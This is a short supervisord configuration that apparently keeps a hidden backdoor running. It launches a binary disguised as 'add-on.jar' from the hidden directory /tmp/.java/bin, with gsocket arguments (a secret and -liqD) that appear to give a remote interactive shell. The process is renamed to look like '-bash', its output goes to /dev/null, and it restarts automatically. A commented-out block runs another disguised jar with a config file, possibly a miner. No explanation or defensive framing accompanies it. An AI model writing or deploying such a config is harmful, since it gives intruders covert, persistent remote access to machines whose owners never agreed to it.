[supervisord]
logfile=/dev/null

# [program:app]
# directory=/tmp/.java/bin
# command=./user-patch.jar -c ./conf.json
# stdout_logfile=/dev/null
# autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s be928caed2a1e2c5a16f98139d80bd78-564c961ecd9f9440da62803ca815160c -liqD"
command=exec -a -bash ./add-on.jar
stdout_logfile=/dev/null
autorestart = true